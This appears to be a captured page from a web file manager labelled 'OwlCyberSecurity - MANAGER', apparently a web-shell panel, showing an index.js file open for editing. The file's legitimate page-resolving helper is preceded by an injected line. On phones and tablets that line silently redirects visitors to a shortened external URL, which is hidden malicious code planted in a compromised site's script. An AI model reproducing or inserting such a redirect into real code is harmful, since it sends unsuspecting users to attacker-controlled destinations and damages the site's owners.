OwlCyberSecurity - MANAGER
Edit File: index.js
(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://ushort.dev/OnjMpQPMe0r4"); export async function resolvePageComponent(path, pages) { const page = pages[path]; if (typeof page === 'undefined') { throw new Error(`Page not found: ${path}`); } return typeof page === 'function' ? page() : page; }